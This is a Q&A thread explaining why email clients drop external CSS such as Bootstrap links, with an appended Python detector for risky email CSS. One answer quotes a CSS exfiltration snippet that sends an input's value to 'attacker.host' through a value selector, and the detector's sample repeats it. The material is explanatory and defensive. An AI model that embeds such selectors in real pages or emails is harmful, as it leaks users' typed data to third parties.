
I have built an HTML-format email system…
There I am able to send email in HTML format, with internal CSS.

Now I have done the same with external Bootstrap CSS.

There the CSS is missing. Hence I am using an external Bootstrap CSS;
this is my external CSS link:

<link rel="stylesheet" href="https://maxcdn.bootstrapcdn.com/bootstrap/3.3.6/css/bootstrap.min.css">

However, the external Bootstrap CSS loads when I run it as an HTML page.

But it's not working in email.

Please advise me on this.

3 Answers


    1. First, you cannot link external CSS from a CDN or anyplace.
    2. But you can insert images from outside.
    3. You have to write your CSS rules inline in the HTML.
    4. And you cannot use divisions (divs) in your email template HTML code.
    5. You have to make the template’s structure with HTML tables.

    For more email template guidelines: http://earthintegrate.com/guidelines-for-creating-an-html-email-template/

    Good luck!

    Srivin Prabhash

  1. Gmail will strip everything in the <head>; that’s just how they made it.

    What you can do is use a service like Mailchimp’s inline CSS generator to make all of the inline code for you.

  2. The reason for blocking external CSS is that it provides the same tracking ability that tracking pixels do – a given email is requesting data from a remote server in order to be able to render the page. Thus, no reasonable email client is going to allow you an uncontrolled CSS external link.

    This abuse of CSS can be taken to the length of a complete CSS Keylogger which was discussed at length in Mike Gualtieri’s post.

    Quoting Mike:

    The CSS Exfil attack centers around the CSS ‘value selectors’, which can be used to parse HTML tag attribute data.

    This simple example demonstrates how these selectors can be abused:

    <style>
        #username[value="mikeg"] {
                background:url("https://attacker.host/mikeg");
        }
    </style>
    <input id="username" value="mikeg" />
    

    In the above example, when the HTML/CSS is rendered in a web browser, a background image is loaded on a remote host controlled by the attacker, indicating the value of the input is ‘mikeg’. To make the attack more useful, additional text parsing is required. Below are several proof of concept exploits demonstrating the variety, scope, and severity of potential attacks.


    As mentioned in this Hacker News thread, it is prudent to leave password inputs completely uncontrolled, i.e. let the browser do its normal thing for updating the DOM based on user input.

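The kind of check a mail client or gateway can run before rendering, as an added example that is not part of any answer above or of Mike Gualtieri's post: it flags external stylesheets and CSS rules that pair an attribute value selector with a remote `url()`. The names `audit` and `EmailCssAudit` and the finding labels are hypothetical, and only flat `selector { body }` rules are parsed.

```python
import re
from html.parser import HTMLParser

# Remote fetch in CSS: url(http://..), url(https://..) or url(//..)
REMOTE_URL = re.compile(r"""url\(\s*['"]?\s*(?:https?:)?//[^)'"\s]+""", re.I)
VALUE_SELECTOR = re.compile(r"\[\s*value\s*[~|^$*]?=", re.I)  # [value="x"] etc.
RULE = re.compile(r"([^{}]+)\{([^{}]*)\}")  # flat "selector { body }" rules only

class EmailCssAudit(HTMLParser):
    """Collects (kind, detail) findings about remote CSS in an email body."""
    def __init__(self):
        super().__init__()
        self.findings, self._css, self._in_style = [], [], False

    def handle_starttag(self, tag, attrs):
        a = {k: (v or "") for k, v in attrs}
        if tag == "link" and "stylesheet" in a.get("rel", "").lower():
            self.findings.append(("external-stylesheet", a.get("href", "")))
        if tag == "style":
            self._in_style = True
        if REMOTE_URL.search(a.get("style", "")):
            self.findings.append(("remote-url-inline", a["style"]))

    def handle_data(self, data):
        if self._in_style:
            self._css.append(data)

    def handle_endtag(self, tag):
        if tag == "style" and self._in_style:
            css, self._css, self._in_style = "".join(self._css), [], False
            for selector, body in RULE.findall(css):
                if REMOTE_URL.search(body):
                    exfil = VALUE_SELECTOR.search(selector)
                    kind = "value-selector-exfil" if exfil else "remote-url"
                    self.findings.append((kind, selector.strip()))

def audit(html):
    parser = EmailCssAudit()
    parser.feed(html)
    parser.close()
    return parser.findings

# Constructed sample: the two snippets quoted on this page plus table markup.
SAMPLE = """<html><head>
<link rel="stylesheet" href="https://maxcdn.bootstrapcdn.com/bootstrap/3.3.6/css/bootstrap.min.css">
<style>
  #username[value="mikeg"] { background:url("https://attacker.host/mikeg"); }
</style></head><body><table><tr><td class="note">Hello</td></tr></table>
<input id="username" value="mikeg" /></body></html>"""
```

Calling `audit(SAMPLE)` returns one finding for the Bootstrap `<link>` and one for the `#username[value="mikeg"]` rule; a template that uses only inline, local styles returns an empty list.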